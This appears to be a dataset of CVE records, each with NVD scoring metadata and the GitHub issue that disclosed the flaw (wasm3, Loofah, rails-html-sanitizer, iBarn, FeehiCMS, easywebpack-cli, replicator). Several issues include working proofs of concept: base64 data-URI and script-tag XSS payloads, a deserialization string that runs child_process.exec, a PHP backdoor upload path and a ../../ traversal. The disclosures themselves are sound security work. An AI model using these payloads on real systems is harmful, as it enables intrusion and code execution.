─────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────────────────────────────────────────────────────────
In file: /home/chuwei/tools/wasm3/source/m3_exec.h
550 }
551
552
553 d_m3Op (CallIndirect)
554 {
► 555 u32 tableIndex = slot (u32);
556 IM3Module module = immediate (IM3Module);
557 IM3FuncType type = immediate (IM3FuncType);
558 i32 stackOffset = immediate (i32);
559 IM3Memory memory = m3MemInfo (_mem);
560
─────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffc400 —▸ 0x62d00000040c —▸ 0x100000ffd ◂— 0x0
01:0008│ 0x7fffffffc408 ◂— 0x7fff0000001b
02:0010│ 0x7fffffffc410 —▸ 0x62d000000408 —▸ 0xffd0000001c ◂— 0x0
03:0018│ 0x7fffffffc418 —▸ 0x62d000000400 ◂— 0x0
04:0020│ 0x7fffffffc420 —▸ 0x7fffffffc4b0 —▸ 0x631000000800 ◂— 0xc00000000000
05:0028│ 0x7fffffffc428 —▸ 0x58b466 (EnsureCodePageNumLines+134) ◂— cmp eax, dword ptr [rbp - 0xc]
06:0030│ 0x7fffffffc430 —▸ 0x62d000000408 —▸ 0xffd0000001c ◂— 0x0
07:0038│ 0x7fffffffc438 —▸ 0x626000000360 ◂— 0x4000700060000
───────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────────────
► f 0 0x535f51 op_CallIndirect+241
f 1 0x579efa op_SetSlot_i32+314
f 2 0x56175a op_f32_Negate_r+154
f 3 0x56175a op_f32_Negate_r+154
f 4 0x56175a op_f32_Negate_r+154
f 5 0x56175a op_f32_Negate_r+154
f 6 0x56175a op_f32_Negate_r+154
f 7 0x5618ad op_f32_Negate_s+333
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
```
## Asan info
```c
AddressSanitizer:DEADLYSIGNAL
=================================================================
==10355==ERROR: AddressSanitizer: SEGV on unknown address 0x63100003b188 (pc 0x000000535f51 bp 0x7ffe3d8772d0 sp 0x7ffe3d8771a0 T0)
==10355==The signal is caused by a READ memory access.
#0 0x535f50 in op_CallIndirect /home/chuwei/tools/wasm3/source/./m3_exec.h:555:35
#1 0x579ef9 in op_SetSlot_i32 /home/chuwei/tools/wasm3/source/./m3_exec.h:941:1
#2 0x561759 in op_f32_Negate_r /home/chuwei/tools/wasm3/source/./m3_exec.h:277:1
#3 0x561759 in op_f32_Negate_r /home/chuwei/tools/wasm3/source/./m3_exec.h:277:1
#4 0x561759 in op_f32_Negate_r /home/chuwei/tools/wasm3/source/./m3_exec.h:277:1
#5 0x561759 in op_f32_Negate_r /home/chuwei/tools/wasm3/source/./m3_exec.h:277:1
#6 0x561759 in op_f32_Negate_r /home/chuwei/tools/wasm3/source/./m3_exec.h:277:1
#7 0x5618ac in op_f32_Negate_s /home/chuwei/tools/wasm3/source/./m3_exec.h:277:1
#8 0x54dbf2 in op_MemGrow /home/chuwei/tools/wasm3/source/./m3_exec.h:704:5
#9 0x54ed80 in op_i32_EqualToZero_s /home/chuwei/tools/wasm3/source/./m3_exec.h:282:1
#10 0x5741a5 in op_Entry /home/chuwei/tools/wasm3/source/./m3_exec.h:808:21
#11 0x5933da in RunCode /home/chuwei/tools/wasm3/source/./m3_exec_defs.h:58:5
#12 0x59a9ba in m3_CallArgv /home/chuwei/tools/wasm3/source/m3_env.c:953:25
#13 0x515fe1 in repl_call /home/chuwei/tools/wasm3/platforms/app/main.c:274:18
#14 0x518cc8 in main /home/chuwei/tools/wasm3/platforms/app/main.c:634:26
#15 0x7f6fe6325c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#16 0x41c6f9 in _start (/home/chuwei/tools/wasm3/build/wasm3+0x41c6f9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/chuwei/tools/wasm3/source/./m3_exec.h:555:35 in op_CallIndirect
==10355==ABORTING
````
## Credit
wysyrg、hushs1gnal
[op_CallIndirect.zip](https://github.com/wasm3/wasm3/files/9441284/op_CallIndirect.zip)
| SEGV wasm3/source/./m3_exec.h:555:35 in op_CallIndirect | https://api.github.com/repos/wasm3/wasm3/issues/380/comments | 1 | 2022-08-29T03:11:58Z | 2022-08-29T10:30:04Z | https://github.com/wasm3/wasm3/issues/380 | 1,353,624,545 | 380 | 4,502 |
CVE-2022-23515 | 2022-12-14T14:15:10.553 | Loofah is a general library for manipulating and transforming HTML/XML documents and fragments, built on top of Nokogiri. Loofah >= 2.1.0, < 2.19.1 is vulnerable to cross-site scripting via the image/svg+xml media type in data URIs. This issue is patched in version 2.19.1. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/flavorjones/loofah/issues/101"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/flavorjones/loofah/security/advisories/GHSA-228g-948r-83gx"
},
{
"source": "security-advisories@github.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1694173"
},
{
"source": "security-advisories@github.com",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00011.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/flavorjones/loofah/issues/101"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/flavorjones/loofah/security/advisories/GHSA-228g-948r-83gx"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1694173"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00011.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:loofah_project:loofah:*:*:*:*:*:ruby:*:*",
"matchCriteriaId": "68F8B0CB-F78F-410C-942F-7FA80481474D",
"versionEndExcluding": "2.19.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/flavorjones/loofah/issues/101 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"flavorjones",
"loofah"
] | I just posted [this issue at the Rails HTML Sanitizer repo](https://github.com/rails/rails-html-sanitizer/issues/51), but after testing I realized that it goes wrong inside Loofah itself.
---
This is the problem:
When I sanitize a HTML string with an image whose src points to a data URI, its src attribute is removed (even when src is whitelisted):
```
unclean_html = "A test
<img src=\"http://placehold.it/400x300\">
<img src='data:image/gif;base64,R0lGODlhAQABAPAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='/>"
clean_html = Loofah.fragment(unclean_html).scrub!(:strip).to_s
clean_html
# => "A test\n <img src=\"http://placehold.it/400x300\">\n <img>"
```
I presume that this happens because of too strict JS-prevention measures (or the data-URI is just discarded because the sanitizer does not understand the `data:` protocol?).
I hope this can be fixed.
| Data URI's get sanitized | https://api.github.com/repos/flavorjones/loofah/issues/101/comments | 8 | 2016-02-18T22:40:13Z | 2018-02-11T22:19:55Z | https://github.com/flavorjones/loofah/issues/101 | 134,718,869 | 101 | 4,503 |
CVE-2022-23518 | 2022-12-14T17:15:10.713 | rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. Versions >= 1.0.3, < 1.4.4 are vulnerable to cross-site scripting via data URIs when used in combination with Loofah >= 2.1.0. This issue is patched in version 1.4.4. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/rails/rails-html-sanitizer/issues/135"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-mcvf-2q2m-x72m"
},
{
"source": "security-advisories@github.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1694173"
},
{
"source": "security-advisories@github.com",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00012.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/rails/rails-html-sanitizer/issues/135"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-mcvf-2q2m-x72m"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://hackerone.com/reports/1694173"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00012.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rubyonrails:rails_html_sanitizers:*:*:*:*:*:rails:*:*",
"matchCriteriaId": "B07277FF-73C7-4F2C-8515-8927193955B2",
"versionEndExcluding": "1.4.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.0.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:loofah_project:loofah:*:*:*:*:*:ruby:*:*",
"matchCriteriaId": "68F8B0CB-F78F-410C-942F-7FA80481474D",
"versionEndExcluding": "2.19.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/rails/rails-html-sanitizer/issues/135 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"rails",
"rails-html-sanitizer"
] | Currently in the scrub_attribute method, there is divergence between the code present in loofah
https://github.com/flavorjones/loofah/blob/main/lib/loofah/html5/scrub.rb#L38-L61
vs how it is handle in the PermitScrubber class
https://github.com/rails/rails-html-sanitizer/blob/master/lib/rails/html/scrubbers.rb#L142-L154
The section around safe data uri is missing
Because of this, a base64 encoded XSS script can be injected. I have attached a test for the same.
```
def test_sanitize_data_protocol
text = '- XSS><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">- XSS><iframe src="data:application/vnd.wap.xhtml+xml;base64,PHg6c2NyaXB0IHhtbG5zOng9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3g6c2NyaXB0Pg=="></iframe></iframe>'
scope_allowed_tags %w(iframe) do
scope_allowed_attributes %w(src) do
assert_equal %(- XSS\"><iframe>- XSS\"><iframe></iframe></iframe>), safe_list_sanitize(text)
end
end
end
```
The test fails with
```
1) Failure:
SanitizersTest#test_sanitize_data_protocol [/home/goromlagche/work/rails-html-sanitizer/test/sanitizer_test.rb:523]:
--- expected
+++ actual
@@ -1 +1 @@
-"- XSS\"><iframe>- XSS\"><iframe></iframe></iframe>"
+"- XSS\"><iframe src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=\">- XSS\"><iframe src=\"data:application/vnd.wap.xhtml+xml;base64,PHg6c2NyaXB0IHhtbG5zOng9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3g6c2NyaXB0Pg==\"></iframe></iframe>"
```
Unable to scrub the base64 encoded script.
I am not well accustomed to this project or loofah, but I tried updating the corresponding code to be in sync with loofah, and that seems to solve the xss problem. Change is in PR https://github.com/rails/rails-html-sanitizer/pull/134
| xss vulnerability in data URI | https://api.github.com/repos/rails/rails-html-sanitizer/issues/135/comments | 2 | 2022-06-08T12:01:02Z | 2022-12-13T13:57:12Z | https://github.com/rails/rails-html-sanitizer/issues/135 | 1,264,633,459 | 135 | 4,504 |
CVE-2020-20588 | 2022-12-15T19:15:15.297 | File upload vulnerability in function upload in action/Core.class.php in zhimengzhe iBarn 1.5 allows remote attackers to run arbitrary code via avatar upload to index.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/zhimengzhe/iBarn/issues/13"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/zhimengzhe/iBarn/issues/13"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ibarn_project:ibarn:1.5:*:*:*:*:*:*:*",
"matchCriteriaId": "F264C1F1-D8E9-4551-86A1-D3A6B16449A5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/zhimengzhe/iBarn/issues/13 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"zhimengzhe",
"iBarn"
] | you can upload any file as avatar at " /index.php?m=user&a=avatar". Althought the server's response show that you are fail to set avatar, but the file was uploaded,And the file can be easily to locate by uid which shows in your cookies.
/action/Core.class.php
```
public function upload() {
if (!$_REQUEST['uid']) {
echo Response::json(LACK, array(tip('用户ID不能为空')));
exit;
}
$_REQUEST['name'] = self::filterName(rawurldecode(self::trimSpace($_REQUEST['name'])));
if (!$_REQUEST['name']) {
echo Response::json(LACK, array(tip('文件名不能为空')));
exit;
}
if (!$_REQUEST['type']) {
if (!file_exists(DATA_DIR)) {
$res = mkdir(DATA_DIR, 0777, true);
if (!$res) {
echo Response::json(FAIL, array(tip('存储目录创建失败')));
exit;
}
}
}
if (!file_exists(UP_DIR)) {
$res = mkdir(UP_DIR, 0777, true);
if (!$res) {
echo Response::json(FAIL, array(tip('存储目录创建失败')));
exit;
}
}
include LIB_PATH . 'plupload' . DS . 'PluploadHandler.php';
PluploadHandler::no_cache_headers();
PluploadHandler::cors_headers();
if (!PluploadHandler::handle(array(
'target_dir' => UP_DIR,
//'allow_extensions' => 'jpg,jpeg,png'
))) {
echo Response::json(FAIL, array(tip('上传失败')));
exit;
} else {
echo Response::json(SUCC, array(tip('上传成功')));
}
}
```
if I logined uid is **185** and my upload filename is **backdoor.php**. Then **http://mywebsite.com/files/18/05/backdoor.php** is my really backdoor.
what's more:
I think the line "//'allow_extensions' => 'jpg,jpeg,png'" is not good to be commented.
| There is a Arbitrary File Upload vulnerability that can upload a php file and be executed. | https://api.github.com/repos/zhimengzhe/iBarn/issues/13/comments | 0 | 2019-11-08T03:08:50Z | 2019-11-08T03:32:39Z | https://github.com/zhimengzhe/iBarn/issues/13 | 519,632,541 | 13 | 4,505 |
CVE-2020-20589 | 2022-12-15T19:15:15.457 | Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.0.8 allows remote attackers to run arbitrary code via tha lang attribute of an html tag. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/45"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/45"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:feehi:feehicms:2.0.8:*:*:*:*:*:*:*",
"matchCriteriaId": "4AEB1B4F-33FF-4363-BB98-B7151666907B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/liufee/cms/issues/45 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liufee",
"cms"
] | This is a Cross Site Scripting vulnerability appear two place(frontend and backend). When the lang is english"><script>alert(/xss/)</script>< or other js code, the pop-up alert will be triggered when browsing the feehi post. Details are as follows:
POC example:
`http://demo.cms.feehi.com/index.php?r=site/language&lang=english"><script>alert(/xss/)</script><`
or
`http://demo.cms.feehi.com/admin/index.php?r=site/language&lang=english"><script>alert(/xss/)</script>`

View any post and xss pop-up:


jscode:

| XSS vulnerability in feehicms v2.0.8 | https://api.github.com/repos/liufee/cms/issues/45/comments | 1 | 2019-11-08T07:23:16Z | 2019-12-23T15:22:34Z | https://github.com/liufee/cms/issues/45 | 519,855,587 | 45 | 4,506 |
CVE-2020-24855 | 2022-12-15T19:15:15.567 | Directory Traversal vulnerability in easywebpack-cli before 4.5.2 allows attackers to obtain sensitive information via crafted GET request. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/easy-team/easywebpack-cli/issues/25"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/easy-team/easywebpack-cli/issues/25"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:easyjs:easywebpack-cli:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6C679FCF-1234-4D90-B34A-9314E54E54BF",
"versionEndExcluding": "4.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/easy-team/easywebpack-cli/issues/25 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"easy-team",
"easywebpack-cli"
] | 你好~ 我发现了easywebpack-cli的一个安全问题,在使用easywebpack-cli并使用-d参数指定了生效目录后,使用"../../"会造成目录穿越问题,能够查看主机中的文件(如数据库连接文件等)。
复现方法:
1、执行 npm i -g easywebpack-cli
2、执行 easy server -d mock -p 8009,-d 指向任意一个目录
3、使用postman或其他工具发包,即可查看文件

我并没有查看您的代码来定位问题位置,因此我也不太确定是否是easywebpack-cli引入easywebpack的问题,请见谅。
希望您能够确认问题或及时回复哦~ 多谢
Easywebpack-cli directory traversal vulnerability
Hello~ I found a security problem with easywebpack-cli. After using easywebpack-cli and using the -d parameter to specify the effective directory, using "../../" will cause directory traversal problems. You can view the host Files (such as database connection files, etc.).
Reproduction method:
1.npm i -g easywebpack-cli
2.easy server -d mock -p 8009, -d points to any directory
3.Use postman or other tools to send the request to view the file
(See above for related pictures)
| easywebpack-cli目录穿越漏洞 | https://api.github.com/repos/easy-team/easywebpack-cli/issues/25/comments | 9 | 2020-08-18T13:19:15Z | 2020-09-05T11:12:54Z | https://github.com/easy-team/easywebpack-cli/issues/25 | 681,035,701 | 25 | 4,507 |
CVE-2021-33420 | 2022-12-15T19:15:15.807 | A deserialization issue discovered in inikulin replicator before 1.0.4 allows remote attackers to run arbitrary code via the fromSerializable function in TypedArray object. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://advisory.checkmarx.net/advisory/CX-2021-4787"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/inikulin/replicator/commit/2c626242fb4a118855262c64b5731b2ce98e521b"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/inikulin/replicator/issues/16"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/inikulin/replicator/pull/17"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://advisory.checkmarx.net/advisory/CX-2021-4787"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/inikulin/replicator/commit/2c626242fb4a118855262c64b5731b2ce98e521b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/inikulin/replicator/issues/16"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/inikulin/replicator/pull/17"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:replicator_project:replicator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "25A2AF0B-DD59-4995-96F6-93F3BCA6F0E8",
"versionEndExcluding": "1.0.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"502"
] | 502 | https://github.com/inikulin/replicator/issues/16 | [
"Third Party Advisory"
] | github.com | [
"inikulin",
"replicator"
] | The current TypedArray code leads to an RCE:
```
const Replicator = require('replicator');
const replicator = new Replicator();
replicator.decode('[{"@t":"[[TypedArray]]","data":{"ctorName":"setTimeout","arr":{"@t":"[[TypedArray]]","data":{"ctorName":"Function","arr":" require(\'child_process\').exec(\'calc\')"}}}}]')
```
Discovered by Yaniv Nizry (https://twitter.com/ynizry) from the CxSCA AppSec team at Checkmarx.” | Refactor the TypedArray deserializer to avoid RCE | https://api.github.com/repos/inikulin/replicator/issues/16/comments | 0 | 2021-05-14T15:00:14Z | 2021-05-17T13:07:59Z | https://github.com/inikulin/replicator/issues/16 | 891,994,341 | 16 | 4,508 |
CVE-2021-36572 | 2022-12-15T19:15:15.860 | Cross Site Scripting (XSS) vulnerability in Feehi CMS thru 2.1.1 allows attackers to run arbitrary code via the user name field of the login page. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/58"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/58"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:feehi:feehicms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BC1BB163-E338-4110-A6B8-0AF9510EDE25",
"versionEndExcluding": null,
"versionEndIncluding": "2.1.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/liufee/cms/issues/58 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liufee",
"cms"
] | Hi i found xss vuln on Feehi CMS Login Form.
What is XSS?
Attacker can inject and executee javascript code to webpage.
Feehi CMS response your input data on webpage. Like
<img width="1285" alt="Screen Shot 2021-07-03 at 7 32 47 PM" src=https://user-images.githubusercontent.com/77003357/124355230-1d215300-dc36-11eb-923d-5b0706602b71.png>
So attacker can inject javascript code into webpage using form request.
POC Videos:
